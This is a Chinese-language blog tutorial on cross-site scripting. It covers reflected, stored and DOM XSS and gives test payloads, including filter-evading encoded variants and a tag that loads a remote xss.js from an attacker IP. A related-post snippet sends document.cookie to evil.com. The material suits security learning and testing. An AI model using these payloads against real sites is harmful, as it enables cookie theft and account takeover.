XSS类型概述及示范用例

最新推荐文章于 2025-03-18 15:19:31 发布
最新推荐文章于 2025-03-18 15:19:31 发布
阅读量895 收藏 3
点赞数 3
分类专栏: 网络安全 文章标签: xss web安全 javascript php css
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NZXHJ/article/details/125966534
版权

XSS概念

XSS攻击全称跨站脚本攻击,是为不和CSS(Cascading Style Sheets, 层叠样式表)的缩写混淆,故将 跨站脚本攻击 缩写为XSS,它是一种在web应用中的计算机安全漏洞,允许用户恶意将代码植入到web网站里面,供给其它用户访问,当用户访问到有恶意代码的网页就会产生xss攻击。

XSS的危害

盗取各类用户帐号;读取、篡改、添加、删除企业敏感数据;发送电子邮件或网站挂马;控制受害者机器向其它网站发起攻击

XSS的类型

反射型XSS

反射型XSS,需要欺骗用户自己去点击链接才能触发XSS代码,是非持久化的攻击

交互表现: 用户<=>web服务端<==>服务器

举例

http://target_sys.com/xss/xss01.php?name=%3Cscript%3Ealert(/xss/)%3C/script>

image-20220724205839683
存储型XSS

存储型XSS,是持久化攻击,比如个人信息或发表文章窗口没有过滤或过滤不严时,xss代码在其实现后存储入服务器,用户访问该页面的时候触发代码执行。

交互表现: 用户<=>web服务端<=>服务器<==>数据库

截取cookie的例子

<SCRIPT>alert(document.cookie)</SCRIPT>
image-20220724211309657
dom型XSS

DOM,全称Document Object Model,是一个平台和语言 中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。

DOM型XSS是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。

在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。可以通过JS脚本对文档对象进行编辑从而修改页面的元素。 客户端的脚本程序可以通过DOM来动态修改页面内容,从客户端获取DOM中的数据并在本地执行。基于这个特性,就可以利用JS脚本来实现XSS漏洞的利用。

例子如下(IE浏览器的例子,仅作参考) 目前传统domXSS在谷歌火狐Edge等现代浏览器都不能起作用

image-20220724231656234

XSS测试用例

<SCRIPT>alert(document.cookie)</SCRIPT>

<img src=1 onerror=alert(document.cookie)

<script>alert(document.cookie)</script>  <script>alert(vulnerable)</script>
 
<s&#99;ript>alert('XSS')</script>

<img src="javas&#99;ript:alert('XSS')">

<IMG src="/JaVaScRiPt.:alert"('XSS')>

<IMG src="/JaVaScRiPt.:alert"(&quot;XSS&quot;)>

<IMG SRC="jav&#x09;ascript.:alert('XSS');">

XSS利用操作

留言框中XSS加载payload攻击

前提,IP机中的js文件存在且可被加载

<script src="http://xxx.xxx.xxx.xxx/xss.js"></script>

加载后开发者工具网络中可查找js资源请求下载和加载js文件

image-20220724234220006

服务器文件目录

image-20220724234551733

                               以纪念我的2020......
测试面试问题总汇
hallomrzhang的博客
12-17 7万+
给你一个全新的软件,你就是负责人,你怎么去开展测试工作 参考回答: 第一步:需求分析:我会对这个全新的软件需求进行全面分析,主要的分析点有:1.软件的版本需求合理性,是否可测试;2.项目人员配置(遇到什么问题找谁,有多少人投入测试,测试环境,硬件,软件);3.要测试的软件的主流程,异常流程,测试重点;4。项目整体规划(发布时间 第二布:指定测试策略、测试计划和bug定义标准,这一步主要是针对需求,...
xss测试用
liu_xp_mother的博客
07-11 7587
1. alert(1); 2.alert('xss'); 3. 4.location.href="http://www.evil.com/cookies.php?cookie="+escape(document.cookie)" 5.ipt>alert('xss');ipt> 6. 7.@im\port'\ja\vasc\ript:alert(\"xss\")'; 8.alert(\
XSS攻击实1
01-11
简单让你了解xss攻击。 项目基于Asp.net 框架,VS2010下创建,C#语言
(二)XSS
weixin_43047908的博客
04-10 1146
Reflected XSS Reflected XSS into HTML context with nothing encoded 构造攻击脚本:<script>alert(1)</script> 将该脚本输入到搜索框中 Reflected XSS into HTML context with most tags and attributes blocked 在搜索功能中包含反射型跨站点脚本漏洞,但是使用了Web应用程序防火墙(WAF)来防御常见的XSS向量。 构造payload
XSS详解
最新发布
尘玥的故事
03-18 1153
XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故缩写为XSS。这是⼀种将任意Javascript代码插⼊到其他Web⽤户⻚⾯⾥执⾏以达到攻击⽬的的漏洞。攻击者利⽤浏览器的动态展示数据功能,在HTML⻚⾯⾥嵌⼊恶意代码。当⽤户浏览改⻚时,这些潜⼊在HTML中的恶意代码会被执⾏,⽤户浏览器被攻击者控制,从⽽达到攻击者的特殊⽬的,如cookie窃取等。
能够发现90%以上XSS漏洞的7个主要的XSS
weixin_42976700的博客
11-04 2037
在阅读有关XSS的材料时,我们通常会看到经典的<script> alert(1)</ script>作为这种漏洞的证明(PoC –概念证明)。尽管确实如此,但它并没有超出此范围,这使得该领域的新手可以寻求更多解决方案来应对现实情况。 因此,这是每个人都应该知道能够利用那里的绝大多数XSS缺陷的7种情况。建立了一个网页来显示它们的变化(单引号或双引号)来进行训练(单击以转到它): 在源代码的开头,有一个HTML注释,其中包含用于触发每种情况的所有参数。它们都适...
xss 一些
aimnr的博客
08-18 863
这里接收了一个somebody参数,传到了spaghet的h2标签里面,用了innerHTML来插入,可识别html标签h2标签里面是可以识别html标签的,直接用img错误路径就行?
各类花里胡哨的XSS攻击举解读(正在持续更新中~)
WalterBailey's Blog
04-24 2792
文章目录XSS攻击XSS Payload“Cookie劫持”攻击更为强大XSS Payload构造GET和POST请求GET请求POST请求通过XSS Payload读取QMail用户的邮件文件夹XSS钓鱼识别用户浏览器通过XSS读取浏览器的UserAgent对象:另一种方法识别用户安装的软件 XSS攻击 XSS Payload XSS攻击成功后,攻击者能够对用户当前浏览的页面植入恶意脚本,通过...
GengonoSikumi项目测试概述
鉴于此,以下内容将围绕一个假定的软件项目“GengonoSikumi”及其潜在的开发环境、工具、流程和概念来展开,尽管这不是基于确切的信息,但可以提供相关IT知识的示范。 ### 软件开发项目管理 #### 1. 版本控制系统 ...
软件安全策略:安全开发生命周期与敏捷安全实践
软件安全概述 ## 1.1 软件安全概念解释 在当今数字化的时代,软件安全已经成为了企业和个人关注的焦点。软件安全指的是保护软件免受恶意攻击和未经授权的访问的一系列技术、工具和最佳实践。软件安全的目标是确保...
风险驱动开发模式:敏捷与安全融合的创新实践
本文首先概述了风险驱动开发模式的基本概念,随后深入探讨了敏捷开发与安全性融合的实践方法及其挑战。接着,本文重点分析了风险评估与管理的理论和实践,以及安全自动化测试工具与持续集成的实践。文章还讨论了组织...
代码质量提升指南:Replit中的代码审查工具使用技巧
代码审查的重要性与Replit概述 在当今的软件开发领域中,代码审查不仅仅是一个提高代码质量的手段,更是团队协作、知识传递和技能提升的重要组成部分。优秀的代码审查能够帮助团队发现潜在的错误、统一编码风格、...
计算机安全XSS 实际攻击举
11-03
计算机安全黑客技术,涉及计算机安全攻防技术,有XSS实际操作和演练,涉及计算机软件
XSS
技术资料库
10-19 6325
Note from the author: XSS is Cross Site Scripting. If you dont know how XSS (Cross Site Scripting) works, this page probably wont help you. This page is for people who
跨站脚本功攻击,xss,一个简单的子让你知道什么是xss攻击
weixin_34008933的博客
11-14 298
跨站脚本功攻击,xss,一个简单的子让你知道什么是xss攻击 一、总结 一句话总结:比如用户留言功能,用户留言中写的是网页可执行代码,如js代码,然后这段代码在可看到这段留言的不同一户的显示上就会执行。   1、什么是xss? 用户 代码 页面 XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为...
10个XSS攻击实
m0_49521873的博客
05-25 2191
1. Cookie盗窃攻击:攻击者可以通过注入恶意代码,获取用户的 Cookie,并利用 Cookie 进行身份验证,获取用户的敏感信息。4. 注入点击劫持攻击:攻击者可以注入一段代码,将隐藏的按钮伪装成用户需要点击的区域,当用户点击时,实际上在执行一个恶意操作。9. 恶意相片攻击:攻击者可以在从社交媒体网站下载的相片中注入一段代码,当用户查看相片时,代码就会临时运行,窃取用户的信息。8. 恶意广告攻击:攻击者可以在广告中注入一段代码,当用户点击广告时,代码就可以窃取用户的个人信息。
最全--跨站脚本攻击(XSS)举和预防方法
Keep trying, keep going
04-30 1840
跨站脚本攻击(XSS)是指攻击者通过,从而窃取用户信息、篡改网页内容等。。
xss测试用小结
weixin_34343000的博客
02-04 214
&lt;script&gt;alert("跨站")&lt;/script&gt; (最常用) &lt;img scr=javascript:alert("跨站")&gt;&lt;/img&gt; &lt;img scr="javascript: alert(/跨站/)&gt;&lt;/img&gt; &lt;img scr="javas??
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值